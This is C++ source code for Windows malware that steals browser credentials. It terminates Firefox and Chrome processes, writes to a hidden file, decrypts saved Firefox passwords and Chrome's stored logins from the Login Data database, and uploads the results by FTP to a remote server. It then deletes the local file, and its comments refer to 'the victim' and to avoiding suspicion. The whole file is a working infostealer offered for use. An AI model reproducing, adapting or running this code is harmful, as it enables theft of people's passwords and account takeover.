#include <windows.h>#include <Shlwapi.h>#include <Shlobj.h>#include <strin

1. #include <windows.h>
2. #include <Shlwapi.h>
3. #include <Shlobj.h>
4. #include <string>
5. #include <cstdio>
6. #include <Wincrypt.h>
7. #include <fstream>
8. #include <tlhelp32.h>
9. #include <time.h>
10. #include <wininet.h>
11. #include "misc.h"
12. #include "firefox.h"
13. #include "chrome.h"
14.  
15. #pragma comment (lib, "shlwapi.lib")
16. #pragma comment (lib, "crypt32.lib")
17. #pragma comment (lib, "Shell32.lib")
18. #pragma comment (lib, "wininet.lib")
19.  
20. using namespace std;
21.  
22. void main(){
23. /*Lets create a timestamp,so we can use it as a file name when we upload data.txt to a FTP server,
24. so we can distinguish new uploads from older ones
25. */
26. time_t timer;
27. time(&timer);
28.  
29. tm info;
30. localtime_s(&info, &timer);
31. char date[30];
32. asctime_s(date, 30, &info);
33. char timeStamp[30];
34. _i64toa(timer, timeStamp, 10);
35.  
36. /*Kill any firefox.exe or chrome.exe process to make sure there is nothing standing in our way
37. plugin-container.exe must be closed before firefox.exe,otherwise an crushing error of it will rise suspicions
38. */
39. int firefoxCount;
40. int chromeCount;
41. int firefoxPluginCount;
42.  
43. DWORD *firefoxProcesses = FindProcessIDs("firefox.exe", &firefoxCount);
44. DWORD *chromeProcesses = FindProcessIDs("chrome.exe", &chromeCount);
45. DWORD *firefoxPluginProcesses = FindProcessIDs("plugin-container.exe", &firefoxPluginCount);
46.  
47. for (int i = 0; i < firefoxPluginCount; i++){
48. HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, 0, firefoxPluginProcesses[i]);
49. if (process != INVALID_HANDLE_VALUE){
50. TerminateProcess(process, 0);
51. }
52. CloseHandle(process);
53. }
54.  
55. for (int i = 0; i < firefoxCount; i++){
56. HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, 0, firefoxProcesses[i]);
57. if (process != INVALID_HANDLE_VALUE){
58. TerminateProcess(process, 0);
59. }
60. CloseHandle(process);
61. }
62.  
63. for (int i = 0; i < chromeCount; i++){
64. HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, 0, chromeProcesses[i]);
65. if (process != INVALID_HANDLE_VALUE){
66. TerminateProcess(process, 0);
67. }
68. CloseHandle(process);
69. }
70.  
71. free(firefoxPluginProcesses);
72. free(firefoxProcesses);
73. free(chromeProcesses);
74. Sleep(1000);
75.  
76. /*Open the file just for creation,so we will be able to hide it here,before any data is written to it*/
77.  
78. out = fopen("data.txt", "w");
79. if (out){
80. hide_file("data.txt");
81. //write timeStamp at the top
82. fprintf(out, "Date: %s", date);
83. fclose(out);
84. }
85.  
86. /*Mozilla Firefox part*/
87. char *path = installPath();
88. if (loadFunctions(path)){
89. //Lets see the credentials
90. showDecryptedPasswords();
91. free(path);
92. }
93. else{
94. out = fopen("data.txt", "a+");
95. if (out){
96. fprintf(out, "Mozilla Firefox is not installed!\n");
97. fclose(out);
98. }
99. }
100.  
101.  
102. /*Google Chrome part*/
103. //Load sqlite.dll
104. HMODULE sqliteLib = LoadLibrary("sqlite3.dll");
105. if (sqliteLib){
106. //Lets find the functions in the dll
107. sqlite3_open = (fpSqliteOpen)GetProcAddress(sqliteLib, "sqlite3_open");
108. sqlite3_prepare_v2 = (fpSqlitePrepare_v2)GetProcAddress(sqliteLib, "sqlite3_prepare_v2");
109. sqlite3_step = (fpSqliteStep)GetProcAddress(sqliteLib, "sqlite3_step");
110. sqlite3_column_text = (fpSqliteColumnText)GetProcAddress(sqliteLib, "sqlite3_column_text");
111. sqlite3_finalize = (fpSqliteFinalize)GetProcAddress(sqliteLib, "sqlite3_finalize");
112. sqlite3_close = (fpSqliteClose)GetProcAddress(sqliteLib, "sqlite3_close");
113. char *installPath = readRegistryValue();
114. if (installPath != NULL){
115. //printf("\n\nGoogle Chrome part:\nInstalled in: %s\n\n", installPath);
116. //Now we have to call same sqlite functions to start decrypting this shit:)
117. sqlite3_stmt *stmt;
118. sqlite3 *db;
119.  
120. char databasePath[260];
121. getPath(databasePath, CSIDL_LOCAL_APPDATA);
122. strcat(databasePath, "\\Google\\Chrome\\User Data\\Default\\Login Data");
123.  
124. char *query = "SELECT origin_url, username_value, password_value FROM logins";
125. //Open the database
126. if (sqlite3_open(databasePath, &db) == SQLITE_OK) {
127. if (sqlite3_prepare_v2(db, query, -1, &stmt, 0) == SQLITE_OK) {
128. //Lets begin reading data
129. int entries = 0;
130. out = fopen("data.txt", "a+");
131. if (out){
132. fprintf(out, "\n\n%s", "From Google Chrome:\n\n");
133. while (sqlite3_step(stmt) == SQLITE_ROW) {
134. //While we still have data in database
135. char *url = (char *)sqlite3_column_text(stmt, 0);
136. char *username = (char *)sqlite3_column_text(stmt, 1);
137. BYTE *password = (BYTE *)sqlite3_column_text(stmt, 2); //This is the only encrypted field
138. fprintf(out, "Entry: %d\n", entries);
139. fprintf(out, "Url: %s\n", url);
140. fprintf(out, "Username: %s\n", username);
141.  
142. char *decrypted = CrackChrome(password);
143. fprintf(out, "Password: %s\n", decrypted);
144. fprintf(out, "%s\n", dupncat("-", 50));
145. entries++;
146. }
147. fclose(out);
148. }
149. if (entries == 0){
150. printf("No entries found!\n");
151. }
152. }
153. else
154. printf("Error preparing database!\n");
155. sqlite3_finalize(stmt);
156. sqlite3_close(db);
157. }
158. else
159. printf("Error opening database!\n");
160. }
161. else{
162. out = fopen("data.txt", "a+");
163. if (out){
164. fprintf(out, "Google Chrome is not installed!\n");
165. fclose(out);
166. }
167. }
168. delete[]installPath;
169. FreeLibrary(sqliteLib);
170. }
171. else
172. printf("Necessary sqlite dll not found!\n");
173. //upload the file
174. if (uploadFile("data.txt", dupcat(timeStamp,".txt", 0), "mywebsite.com", "myFTPusername", "myFTPpassword")){
175. //printf("Success upload!\n");
176. }
177.  
178. //delete the file,so no more data is appended to it,if the victim is opening the program again!
179. //we need to create a new file in this case,not use the old one!
180. unlink("data.txt");
181. }